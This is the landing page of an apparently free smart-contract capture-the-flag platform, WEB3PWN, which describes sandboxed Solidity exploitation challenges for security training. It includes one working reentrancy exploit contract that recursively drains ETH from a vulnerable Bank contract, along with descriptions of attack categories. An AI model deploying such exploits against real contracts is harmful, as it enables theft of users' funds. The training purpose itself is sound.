🛡 Web3 Hacking Platform

Hack Smart Contracts.
Exploit Every Flaw.

Find and exploit real vulnerabilities in Solidity smart contracts. Write exploit code, drain contracts, and sharpen your Web3 hacking skills.

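// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "./Bank.sol";

contract Exploit {
    // The vulnerable Bank contract this exploit is pointed at
    Bank public target;

    constructor(address _target) {
        target = Bank(_target);
    }

    // Deposit the ETH sent with this call, then immediately request a withdrawal
    function attack() external payable {
        target.deposit{value: msg.value}();
        target.withdraw();
    }

    // Runs whenever the Bank sends ETH to this contract; calls withdraw()
    // again for as long as the Bank still holds at least 1 ether
    receive() external payable {
        if (address(target).balance >= 1 ether)
            target.withdraw();
    }
}

A reentrancy exploit contract that recursively drains ETH from a vulnerable Bank contract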

Find Vulnerabilities by Exploiting Them

The most effective way to understand smart contract vulnerabilities is to exploit them yourself. WEB3PWN gives you a sandboxed environment to write real Solidity exploit code against vulnerable contracts.

Real Exploit Development

Write actual Solidity exploit contracts against vulnerable targets. No multiple choice — you write the code that drains the contract.

Browser-Based Code Editor

Write, compile, and test your exploits directly in the browser. No local setup, no Foundry, no Hardhat install — just open and start hacking.

Sandboxed Execution

Every exploit runs in an isolated Docker container with Hardhat. Safe, reproducible, and instantly validated against automated test suites.

Progressive Exploit Curriculum

Start with Solidity fundamentals, then advance through real-world vulnerability categories. Each track builds on the last.

Ranks & Leaderboard

Earn points for every challenge solved. Rise through ranks from Novice to Overlord and compete on the global leaderboard.

Modern Solidity 0.8.x

All challenges use Solidity 0.8.19+ with up-to-date vulnerability patterns relevant to today's DeFi and NFT ecosystem.

11 Attack Vectors. 55+ Targets. Infinite Exploits.

From Solidity basics to advanced attack chains, every category covers a real vulnerability class found in production smart contracts.

Solidity Starter

Master Solidity fundamentals: arrays, functions, structs, mappings, and data locations. 10 interactive challenges to build your foundation.

Beginner

Reentrancy Attacks

Exploit the most infamous smart contract vulnerability. Drain banks, hijack NFT airdrops, and chain recursive callbacks across 7 challenges.

Advanced

Access Control

Bypass broken authorization. Claim ownership, steal tokens, and exploit permission flaws in 6 challenges.

Intermediate

Gas Optimization

Write gas-efficient Solidity. Learn storage patterns, caching, struct packing, and iteration tricks across 7 challenges.

Intermediate

Upgradeability Exploits

Attack proxy patterns and upgradeable contracts. Storage collisions, clashing selectors, and factory takeovers in 6 challenges.

Advanced

Denial of Service

Block auctions, freeze staking, and halt ICOs. Learn how smart contracts can be permanently griefed in 5 challenges.

Intermediate

Signature Attacks

Forge signatures, replay transactions, and break verification logic in on-chain protocols across 3 challenges.

Advanced

tx.origin Exploits

Exploit the dangerous tx.origin pattern to phish users and steal funds from vulnerable vaults and token contracts.

Intermediate

Weak Randomness

Predict "random" outcomes on-chain. Rig lotteries and exploit weak entropy sources like block.timestamp and blockhash.

Intermediate

DeFi Missions

Complex multi-contract scenarios inspired by real-world DeFi exploits like Thirdweb and clone attacks. The ultimate test.

Expert

Hack Your First Contract in 3 Minutes

No local toolchain required. Sign up, pick a challenge, and start writing exploits immediately.

Choose a Challenge

Browse 55+ smart contract challenges organized by vulnerability type and difficulty. Each one presents a vulnerable Solidity contract and a clear exploitation objective.

Write Your Exploit

Study the vulnerable contract, identify the flaw, and write a Solidity exploit contract directly in the browser-based code editor. No local setup needed.

Execute & Verify

Hit execute. Your Solidity exploit compiles and runs against the target in a sandboxed Docker environment. Automated Hardhat tests verify if you successfully exploited the vulnerability.

From Zero to Full Exploit

Structured learning paths that take you from writing your first Solidity line to chaining advanced multi-contract exploits.

Beginner

Solidity Foundations

New to Solidity? Start here. Understand the language you'll be attacking — data types, functions, storage patterns, and contract architecture.

  • Value Types & Data Locations
  • Functions & Modifiers
  • Arrays, Mappings & Structs
  • Contract Layout Patterns

10 challenges

Intermediate

Vulnerability Hunter

Know Solidity basics? Dive into common vulnerability classes and learn to identify and exploit real-world smart contract attack patterns.

  • Access Control & tx.origin
  • Denial of Service Attacks
  • Weak Randomness Exploits
  • Gas Optimization Techniques

22 challenges

Why Smart Contract Security Matters

Billions Lost to Smart Contract Exploits

Since 2020, over $6 billion has been stolen through smart contract vulnerabilities in DeFi protocols, bridges, and NFT projects. Reentrancy attacks, access control flaws, and logic bugs continue to be exploited on Ethereum, BSC, Polygon, Arbitrum, and other EVM-compatible chains. Understanding how these exploits work is essential for anyone building or auditing in Web3.

WEB3PWN recreates real vulnerability patterns in a safe, sandboxed environment. Each challenge is a self-contained Hardhat project with a vulnerable Solidity contract and an automated test suite. You write the exploit, the platform verifies it — no testnets, no gas costs, no setup.

Built for Hackers, Not Classrooms

WEB3PWN is not a video course or a lecture series. It is a hands-on smart contract CTF platform where every challenge requires writing working Solidity exploit code. The challenges range from basic Solidity fundamentals to advanced multi-contract DeFi attack scenarios inspired by real incidents like the DAO hack, Thirdweb vulnerability, and various proxy storage collision exploits.

Whether you are preparing for a smart contract audit, practicing for blockchain bug bounties on Immunefi or HackerOne, or studying for Web3 security certifications, WEB3PWN provides the practical exploitation experience that theory alone cannot match.

Frequently Asked Questions

What is WEB3PWN?

WEB3PWN is an interactive Web3 hacking platform where you find and exploit vulnerabilities in smart contracts by writing real Solidity exploit code. It features 55+ challenges across 11 categories including reentrancy, access control, gas optimization, and more. Think of it as a CTF platform built specifically for smart contract exploitation.

Do I need prior Solidity experience?

No! WEB3PWN includes a Solidity Starter track with 10 foundational challenges covering arrays, functions, data locations, and more. You can learn Solidity fundamentals before tackling the exploit challenges. That said, basic programming knowledge is helpful.

Do I need to install anything locally?

No. Everything runs in the browser. You write your exploit code in our online editor, and it's compiled and executed in a sandboxed server environment using Hardhat. No local toolchain, no wallet, no gas fees.

How do the smart contract challenges work?

Each challenge presents a vulnerable smart contract. You write an Exploit.sol contract in the browser-based code editor. Your exploit is compiled and tested against the vulnerable contract using Hardhat in a sandboxed Docker environment. If your exploit passes all tests, the challenge is marked as solved and you earn points toward your rank.

What smart contract vulnerability categories are covered?

WEB3PWN covers the most critical smart contract vulnerability classes: reentrancy attacks (7 challenges), access control vulnerabilities (6 challenges), tx.origin exploits (2 challenges), insecure randomness (2 challenges), denial of service (5 challenges), signature verification flaws (3 challenges), upgradeability issues (6 challenges), gas optimization (7 challenges), and complex multi-contract DeFi missions (3 challenges).

Is WEB3PWN free?

Yes, WEB3PWN is completely free to use. Create an account and start exploiting smart contract vulnerabilities right away. All 55+ challenges are available at no cost.

How is WEB3PWN different from Ethernaut or Damn Vulnerable DeFi?

Unlike Ethernaut or Damn Vulnerable DeFi, which require local setup with Foundry or Hardhat, WEB3PWN runs entirely in your browser. You write Solidity exploit code in an online editor and it compiles and executes in a sandboxed environment. WEB3PWN also features a progressive curriculum from Solidity basics to advanced exploits, a ranking system, and a global leaderboard.

Ready to Exploit Your First Smart Contract?

Join hackers and bug bounty hunters who are sharpening their Web3 exploit skills. Start with the basics or jump straight into advanced attacks.